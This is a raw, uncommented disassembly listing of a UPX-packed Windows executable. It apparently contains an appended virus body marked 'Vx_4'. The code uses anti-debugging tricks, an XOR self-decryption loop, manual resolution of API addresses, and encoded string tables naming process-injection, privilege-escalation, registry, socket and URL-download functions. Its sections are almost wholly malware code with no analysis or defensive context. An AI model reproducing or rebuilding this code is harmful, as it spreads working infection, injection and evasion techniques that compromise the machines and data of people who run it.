dd 68306F31h, 632E7404h, 3ADD8DE7h, 6506ED0Ah, 22686345h
dd 0BDACF600h, 9B6C1EB0h, 0DA61736Eh, 5775660Fh, 0BDADF0BCh
dd 6EEBFF09h, 0A82E696Bh, 6E740067h, 446DACEDh, 611F206Ah
dd 616B3A3Ch, 0C650D1A1h, 2DAC6D0Ch, 0B6D62FCDh, 65B9ED6h
dd 2A620E71h, 86B6CE41h, 234DF29h, 0B6630B7Ah, 5D0BD8Dh
dd 6E2E70F4h, 735B6917h, 1D602D27h, 78AB7003h, 8E617A0Fh
dd 6C75D28Dh, 0B47029C4h, 0B42BDE5Bh, 0C2A86BC7h, 0F4F9195h
dd 1336CB13h, 0F0633269h, 6F4EFD2Bh, 2E626A2Ch, 617A9BA9h
dd 1F0BA81Eh, 61DB3090h, 66176362h, 0FF6C2ADFh, 6A696867h
dd 6E6D6C6Bh, 0BB6B71B9h, 79787776h, 0A37FF97Fh, 4241F57Ah
dd 46454443h, 4A494847h, 504F4E4Bh, 9535251h, 54FE51E9h
dd 58575655h, 0EF4F5A59h, 607737E1h, 0E9652F0Bh, 7068702Eh
dd 0DAD7023Fh, 0F3D6DF6h, 6E63733Fh, 0DB0C6406h, 4B6DC806h
dd 3D3B76DBh, 74133F88h, 22E8C11Bh, 73C480B2h, 0C2A50285h
dd 0AF3E4701h, 36391E35h, 9449B76Dh, 570F416Fh, 3546657Dh
dd 0A0418565h, 6846BF0Ah, 1621430Ch, 6535CC81h, 0D2BA14B6h
dd 614E2931h, 316C39C6h, 686B149Ch, 1E41C466h, 861544FCh
dd 63D23535h, 8A1F79FDh, 0CB77BC2Dh, 79708509h, 450B6E38h
dd 6B819834h, 73405162h, 683A05A5h, 76705953h, 0D060FE53h
dd 0ED70AD5Ah, 78E194Dh, 12B5A19Bh, 540F9432h, 0CC160381h
dd 182C3535h, 0D87C4E21h, 746D0B60h, 6C727068h, 9B306E65h
dd 653D6ECh, 6E1A7065h, 0B25CF1A3h, 12477520h, 0C57C6A0Bh
dd 7264332Eh, 3A4CC80Fh, 0D78764DAh, 7319BFA7h, 4B4CDA4Dh
dd 0B5D4E705h, 4D48200Dh, 1C480840h, 0B6213B2Fh, 1D59B3ADh
dd 6BFF5470h, 4DB275FCh, 0EF72D61Ch, 41784F4Dh, 9BD96FFDh
dd 0DE0D3844h, 0E66C5DBCh, 7645396Eh, 8F0A62A8h, 87704D45h
dd 52317895h, 0B0DEB405h, 865CFADh, 48653353h, 84D3420Fh
dd 4CEA2FCDh, 270045CEh, 0C7B5B073h, 272C440Dh, 0CDE16157h
dd 15462DB5h, 4F0F4B53h, 1DC06A62h, 49986C38h, 0EB5497Ah
dd 0FAABADB4h, 630A6492h, 0F67EC61Ah, 0D15A364Dh, 4BDE678Dh
dd 0B0457965h, 10773858h, 5E0F64C3h, 51ED0AC2h, 0DB11400Ah
dd 0C059B166h, 10219330h, 1DEDDA30h, 410C516Bh, 42609E62h
dd 8745A153h, 436EC941h, 22DB3899h, 48777406h, 0FB6E3828h
dd 440A1082h, 0D60E6112h, 619BB63Ah, 0DB796669h, 2B754067h
dd 476F6136h, 6F186C1Bh, 18112C79h, 6F6F6770h, 0D8F5210h
dd 5E3D9FE4h, 41146573h, 69757163h, 1D2B9C72h, 5494D36h
dd 0ED4C3AA0h, 0DE131669h, 1CAB6DE8h, 0D1F0D685h, 72688007h
dd 0C7892F5Fh, 2A6E3C5Ch, 7F1E685Fh, 0FC747319h, 7235CE66h
dd 36060D11h, 0D7AB7970h, 0FC8E3D8h, 985CF073h, 10E27AE5h
dd 0CD634603h, 0CC341730h, 0B965B962h, 0B3198C15h, 2C0A14D8h
dd 80B0AD02h, 5C491Bh, 10B90D70h, 66DB34E1h, 24F44F41h
dd 0CB6187DAh, 11515330h, 0C2D80A9Fh, 418555B6h, 6E0D0E11h
dd 140C4258h, 6E6E1D7Dh, 441C3716h, 2C74532Bh, 36D96567h
dd 73FF5215h, 960D0202h, 1965965h, 17346F39h, 6596590Ch
dd 13040959h, 0A3811610h, 50E14027h, 5F2FB945h, 14412F99h
dd 0F540D087h, 10B01E0h, 0B83B3D82h, 1312BE06h, 0B60B1D88h
dd 25CEC6ACh, 0F5020B31h, 65B99D07h, 1E0C506Fh, 9791034h
dd 60781BCh, 6C2BF08Eh, 8C642037h, 1E017C64h, 2B8F43D8h
dd 23015D2Eh, 6230790h, 4AC42436h, 20BEE004h, 642EC7B7h
dd 0FE4FBE9h, 7E8D282Bh, 1627C2DDh, 2DF804C0h, 15h, 1200B698h
dd 0FF0000h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31005000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31006AF2
; ---------------------------------------------------------------------------
align 8
loc_31006AE8: ; CODE XREF: UPX1:loc_31006AF9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31006AEE: ; CODE XREF: UPX1:31006B86�j
; UPX1:31006B9D�j
add ebx, ebx
jnz short loc_31006AF9
loc_31006AF2: ; CODE XREF: UPX1:31006AE0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006AF9: ; CODE XREF: UPX1:31006AF0�j
jb short loc_31006AE8
mov eax, 1
loc_31006B00: ; CODE XREF: UPX1:31006B0F�j
; UPX1:31006B1A�j
add ebx, ebx
jnz short loc_31006B0B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B0B: ; CODE XREF: UPX1:31006B02�j
adc eax, eax
add ebx, ebx
jnb short loc_31006B00
jnz short loc_31006B1C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B00
loc_31006B1C: ; CODE XREF: UPX1:31006B11�j
xor ecx, ecx
sub eax, 3
jb short loc_31006B30
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31006BA2
mov ebp, eax
loc_31006B30: ; CODE XREF: UPX1:31006B21�j
add ebx, ebx
jnz short loc_31006B3B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B3B: ; CODE XREF: UPX1:31006B32�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31006B48
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B48: ; CODE XREF: UPX1:31006B3F�j
adc ecx, ecx
jnz short loc_31006B6C
inc ecx
loc_31006B4D: ; CODE XREF: UPX1:31006B5C�j
; UPX1:31006B67�j
add ebx, ebx
jnz short loc_31006B58
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31006B58: ; CODE XREF: UPX1:31006B4F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31006B4D
jnz short loc_31006B69
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31006B4D
loc_31006B69: ; CODE XREF: UPX1:31006B5E�j
add ecx, 2
loc_31006B6C: ; CODE XREF: UPX1:31006B4A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31006B8C
loc_31006B7D: ; CODE XREF: UPX1:31006B84�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31006B7D
jmp loc_31006AEE
; ---------------------------------------------------------------------------
align 4
loc_31006B8C: ; CODE XREF: UPX1:31006B7B�j
; UPX1:31006B99�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31006B8C
add edi, ecx
jmp loc_31006AEE
; ---------------------------------------------------------------------------
loc_31006BA2: ; CODE XREF: UPX1:31006B2C�j
pop esi
mov edi, esi
mov ecx, 82h
loc_31006BAA: ; CODE XREF: UPX1:31006BB1�j
; UPX1:31006BB6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31006BAF: ; CODE XREF: UPX1:31006BD4�j
cmp al, 1
ja short loc_31006BAA
cmp byte ptr [edi], 1
jnz short loc_31006BAA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31006BAF
lea edi, [esi+4000h]
loc_31006BDC: ; CODE XREF: UPX1:31006BFE�j
mov eax, [edi]
or eax, eax
jz short loc_31006C27
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_31006BF9: ; CODE XREF: UPX1:31006C1F�j
mov al, [edi]
inc edi
or al, al
jz short loc_31006BDC
mov ecx, edi
jns short near ptr loc_31006C0A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31006C0A: ; CODE XREF: UPX1:31006C02�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_31006C21
mov [ebx], eax
add ebx, 4
jmp short loc_31006BF9
; ---------------------------------------------------------------------------
loc_31006C21: ; CODE XREF: UPX1:31006C18�j
call dword ptr [esi+6094h]
loc_31006C27: ; CODE XREF: UPX1:31006BE0�j
popa
jmp loc_31001D88
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31007000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 7C801D77h
dword_31007090 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_3101101F+31�r
dd 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 50000387h, 6AD00000h, 0
dd 1E003100h, 680000h, 760h dup(0)
; ---------------------------------------------------------------------------
clc
pusha
push ebp
mov ebp, esp
call sub_31009023
cld
call sub_310090E7
mov eax, eax
cld
mov ebp, 12FFA0h ; DATA XREF: sub_31009023+C�w
jmp short $+2
cmc
stc
jmp short $+2
jmp loc_3100906B
; =============== S U B R O U T I N E =======================================
sub_31009023 proc near ; CODE XREF: UPX2:31009005�p
var_C = dword ptr -0Ch
push dword ptr fs:0
mov fs:0, esp
mov dword ptr ds:loc_31009013+1, ebp
jmp short $+2
nop
jmp short $+2
stc
xor ecx, ecx
push ecx
push ecx
push ecx
push 80000000h
push ecx
push 800h
push 80000000h
push 80000000h
push ecx
push 80000000h
push 2
push 40h
call ds:dword_31007090 ; GetProcAddress
loc_3100906B: ; CODE XREF: UPX2:3100901E�j
clc
cld
sub edi, edi
sub ecx, ecx
cmc
mov cl, 40h
mov edx, edx
stc
loc_31009077: ; CODE XREF: sub_31009023+5A�j
lea edi, [edi+1]
mov edx, edx
cld
loop loc_31009077
call sub_310090E0
clc
cld
add edx, 71h
push edx
mov ecx, 29CCh
nop
cld
cmc
loc_31009095: ; CODE XREF: sub_31009023+84�j
call sub_310090D1
mov ecx, ecx
add edx, 1
sub ecx, 1
mov ecx, ecx
cmp ecx, 0
ja short loc_31009095
pop edx
nop
mov edi, [ebp-8]
mov fs:0, edi
jmp short $+2
xchg ebx, ebx
cld
jmp short $+2
leave
clc
mov [esp+20h+var_C], edx
jmp short $+2
cld
cmc
xchg ebx, ebx
nop
popa
xchg ebx, ebx
stc
mov edx, edx
jmp edx
sub_31009023 endp
; ---------------------------------------------------------------------------
clc
; =============== S U B R O U T I N E =======================================
sub_310090D1 proc near ; CODE XREF: sub_31009023:loc_31009095�p
xchg al, [edx]
clc
stc
xor ax, di
clc
xchg al, [edx]
cmc
retn
sub_310090D1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_310090E0 proc near ; CODE XREF: sub_31009023+5C�p
pop edx
clc
cld
stc
push edx
retn
sub_310090E0 endp
; ---------------------------------------------------------------------------
clc
; =============== S U B R O U T I N E =======================================
sub_310090E7 proc near ; CODE XREF: UPX2:3100900B�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_310090E7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmc
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_31009142
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_31009136
mov ebx, [eax+29C1h]
jmp short loc_31009140
; ---------------------------------------------------------------------------
loc_31009136: ; CODE XREF: UPX2:3100912C�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_31009140: ; CODE XREF: UPX2:31009134�j
mov ebx, [ebx]
loc_31009142: ; CODE XREF: UPX2:31009114�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 1EFAh
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_31009170
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_31009170: ; CODE XREF: UPX2:31009169�j
and ebx, 0FFFFF000h
loc_31009176: ; CODE XREF: UPX2:31009185�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_31009187
loc_3100917F: ; CODE XREF: UPX2:31009194�j
sub ebx, 100h
jnz short loc_31009176
loc_31009187: ; CODE XREF: UPX2:3100917D�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3100917F
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_310091A1: ; CODE XREF: UPX2:loc_310091B5�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_310091B5
cmp dword ptr [eax+5], 6441636Fh
jz short loc_310091BA
loc_310091B5: ; CODE XREF: UPX2:310091AA�j
loop loc_310091A1
pop ecx
jmp short loc_310091E5
; ---------------------------------------------------------------------------
loc_310091BA: ; CODE XREF: UPX2:310091B3�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3100922C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31009273
loc_310091E5: ; CODE XREF: UPX2:310091B8�j
; sub_31009273+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_31009211
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_31009211: ; CODE XREF: sub_31009273-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_31009273
; ---------------------------------------------------------------------------
or dh, [edi+53h]
mov ecx, 2889h
mov ebx, edx
loc_3100921D: ; CODE XREF: UPX2:31009228�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3100921D
pop ebx
retn
; ---------------------------------------------------------------------------
loc_3100922C: ; CODE XREF: UPX2:310091E3�j
call near ptr loc_3100923B+2
inc ebx
insb
outsd
jnb short near ptr loc_31009298+3
dec eax
popa
outsb
db 64h
insb
loc_3100923B: ; CODE XREF: UPX2:loc_3100922C�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_31009257+1
inc ebx
jb short loc_310092B3
popa
jz short near ptr loc_310092B5+1
inc ebp
jbe short near ptr loc_310092B5+4
outsb
jz short loc_31009298
loc_31009257: ; CODE XREF: UPX2:31009246�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_31009273
inc edi
db 65h
jz short near ptr loc_310092B5+1
popa
jnb short near ptr loc_310092DF+2
inc ebp
jb short near ptr loc_310092DF+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31009273 proc near ; CODE XREF: UPX2:31009261�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 310091E5 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31009629 SIZE 0000000B BYTES
push ebx
call esi ; InternetCloseHandle
mov [ebp+103E6Ah], eax
call sub_31009654
test eax, eax
jz loc_310091E5
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_31009629
loc_31009298: ; CODE XREF: UPX2:31009255�j
; UPX2:31009234�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_310092B5
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_310092B3: ; CODE XREF: UPX2:3100924C�j
jmp short loc_310092BC
; ---------------------------------------------------------------------------
loc_310092B5: ; CODE XREF: sub_31009273+2C�j
; UPX2:3100924F�j ...
and dword ptr [ebp+101598h], 0
loc_310092BC: ; CODE XREF: sub_31009273:loc_310092B3�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_310092DF: ; CODE XREF: UPX2:3100926B�j
; UPX2:3100926E�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_31009691
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_310093D8
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_31009629
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_31009629
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_31009629
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_310093C8
jmp loc_31009629
; ---------------------------------------------------------------------------
loc_310093C8: ; CODE XREF: sub_31009273+14B�p
; sub_31009273+162�j
push 0
pop ecx
jecxz short locret_310093D7
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_310093C8
; ---------------------------------------------------------------------------
locret_310093D7: ; CODE XREF: sub_31009273+158�j
retn
; ---------------------------------------------------------------------------
loc_310093D8: ; CODE XREF: sub_31009273+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_31009629
call near ptr loc_310093EF+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_310093EF: ; CODE XREF: sub_31009273+172�p
add bh, bh
sub_31009273 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_31009691
cmp dword ptr [ebp+103F2Eh], 0
jz loc_31009629
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_31009629
mov ecx, [ebp+103F06h]
jecxz short loc_31009478
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_31009478
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_31009478: ; CODE XREF: UPX2:3100945C�j
; UPX2:3100946D�j
call sub_31009635
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_310094C1: ; CODE XREF: UPX2:310094CA�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_310094C1
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_31009629
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
db 50h
dd 6A206A54h, 1A95FFFFh, 8500103Fh, 34755FC0h, 14FE8h
dd 11E800h, 65530000h, 75626544h, 69725067h, 656C6976h
dd 57006567h, 550E8h, 88B5FF00h, 0FF001042h, 103E9E95h
dd 95FF5700h, 103E62h, 26A006Ah, 3E9295FFh, 28B90010h
dd 97000001h, 0C89E12Bh, 0FF575424h, 103ED695h, 83F63300h
dd 103F72A5h, 57540000h, 3EDA95FFh, 0C0850010h, 83466674h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 3ED295FFh, 0C0850010h
dd 0E893DC74h, 588h, 0E391C933h, 7285393Ah, 7500103Fh
dd 247C8132h, 72736324h, 81287473h, 0EAFC1h, 50545000h
dd 50505156h, 8A95FF53h, 8500103Eh, 0F7459C0h, 82474FFh
dd 3F72858Fh, 0B5E80010h, 53FFFFFDh, 3E6295FFh, 8EEB0010h
dd 128C481h, 0FF570000h, 103E6295h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31009273
loc_31009629: ; CODE XREF: sub_31009273+1F�j
; sub_31009273+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_310091E5
; END OF FUNCTION CHUNK FOR sub_31009273
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_31009635 proc near ; CODE XREF: UPX2:loc_31009478�p
; sub_31009654+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_31009635 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
align 4
; =============== S U B R O U T I N E =======================================
sub_31009654 proc near ; CODE XREF: sub_31009273+9�p
xor ecx, ecx
call sub_31009635
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_31009654 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
db 3 dup(58h)
dd 332800h, 0E7300h, 100h, 2 dup(0)
dd 29C000h, 0
db 0
; =============== S U B R O U T I N E =======================================
sub_31009691 proc near ; CODE XREF: sub_31009273+7C�p
; UPX2:31009407�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_3100969C: ; CODE XREF: sub_31009691+E�j
lodsb
test al, al
jnz short loc_3100969C
loop sub_31009691
retn
sub_31009691 endp
; ---------------------------------------------------------------------------
dd 1985958Dh, 0FF520010h, 103EC695h, 88858900h, 0E8001042h
dd 16h, 6B6F6F4Ch, 72507075h, 6C697669h, 56656765h, 65756C61h
dd 0FF500041h, 103E6E95h, 8C858900h, 0C3001042h, 7361425Ch
dd 6D614E65h, 624F6465h, 7463656Ah, 74565C73h, 74636553h
dd 74736C00h, 6E656C72h, 65724300h, 46657461h, 41656C69h
dd 65724300h, 46657461h, 4D656C69h, 69707061h, 41676Eh
dd 61657243h, 72506574h, 7365636Fh, 43004173h, 74616572h
dd 6D655265h, 5465746Fh, 61657268h, 72430064h, 65746165h
dd 65726854h, 43006461h, 74616572h, 6F6F5465h, 6C65686Ch
dd 53323370h, 7370616Eh, 746F68h, 74697845h, 65726854h
dd 46006461h, 54656C69h, 54656D69h, 7379536Fh, 546D6574h
dd 656D69h, 65657246h, 7262694Ch, 797261h, 46746547h, 41656C69h
dd 69727474h, 65747562h, 47004173h, 69467465h, 6953656Ch
dd 4700657Ah, 69467465h, 6954656Ch, 4700656Dh, 6F4D7465h
dd 656C7564h, 646E6148h, 41656Ch, 54746547h, 46706D65h
dd 4E656C69h, 41656D61h, 74654700h, 706D6554h, 68746150h
dd 65470041h, 72655674h, 6E6F6973h, 74654700h, 73726556h
dd 456E6F69h, 47004178h, 6F567465h, 656D756Ch, 6F666E49h
dd 74616D72h, 416E6F69h, 616F4C00h, 62694C64h, 79726172h
dd 614D0041h, 65695670h, 46664F77h, 656C69h, 6E65704Fh
dd 656C6946h, 7070614Dh, 41676E69h, 65704F00h, 6F72506Eh
dd 73736563h, 6F725000h, 73736563h, 69463233h, 747372h
dd 636F7250h, 33737365h, 78654E32h, 65530074h, 6C694674h
dd 74744165h, 75626972h, 41736574h, 74655300h, 656C6946h
dd 656D6954h, 656C5300h, 53007065h, 65747379h, 6D69546Dh
dd 466F5465h, 54656C69h, 656D69h, 616D6E55h, 65695670h
dd 46664F77h, 656C69h, 74726956h, 416C6175h, 636F6C6Ch
dd 69725700h, 69466574h, 4E00656Ch, 6A644174h, 50747375h
dd 69766972h, 6567656Ch, 6B6F5473h, 4E006E65h, 65724374h
dd 46657461h, 656C69h, 7243744Eh, 65746165h, 636F7250h
dd 737365h, 7243744Eh, 65746165h, 636F7250h, 45737365h
dd 744E0078h, 61657243h, 65536574h, 6F697463h, 744E006Eh
dd 61657243h, 73556574h, 72507265h, 7365636Fh, 744E0073h
dd 5670614Dh, 4F776569h, 63655366h, 6E6F6974h, 4F744E00h
dd 466E6570h, 656C69h, 704F744Eh, 72506E65h, 7365636Fh
dd 6B6F5473h, 4E006E65h, 65704F74h, 6365536Eh, 6E6F6974h
dd 50744E00h, 65746F72h, 69567463h, 61757472h, 6D654D6Ch
dd 79726Fh, 7551744Eh, 49797265h, 726F666Eh, 6974616Dh
dd 6F546E6Fh, 6E656Bh, 7257744Eh, 56657469h, 75747269h
dd 654D6C61h, 79726F6Dh, 6C745200h, 63696E55h, 5365646Fh
dd 6E697274h, 416F5467h, 5369736Eh, 6E697274h, 53570067h
dd 61745341h, 70757472h, 6F6C6300h, 6F736573h, 74656B63h
dd 6E6F6300h, 7463656Eh, 74656700h, 74736F68h, 616E7962h
dd 7200656Dh, 766365h, 646E6573h, 636F7300h, 74656Bh, 65746E49h
dd 74656E72h, 736F6C43h, 6E614865h, 656C64h, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 6E490065h, 6E726574h, 704F7465h, 416E65h, 65746E49h
dd 74656E72h, 6E65704Fh, 416C7255h, 746E4900h, 656E7265h
dd 61655274h, 6C694664h, 44410065h, 49504156h, 442E3233h
dd 52004C4Ch, 6C436765h, 4B65736Fh, 52007965h, 704F6765h
dd 654B6E65h, 41784579h, 67655200h, 72657551h, 6C615679h
dd 78456575h, 65520041h, 74655367h, 756C6156h, 41784565h
dd 0F6335600h, 5656026Ah, 16AD48Bh, 1872FF52h, 8C95FF56h
dd 8B001042h, 565656C4h, 70FF5650h, 0FA95FF18h, 8300103Eh
dd 0C25E10C4h, 498D0008h, 51C82BFBh, 68h, 244C8DE8h, 6A006A03h
dd 53505105h, 0CC8B056Ah, 50D48B50h, 51406A54h, 95FF5352h
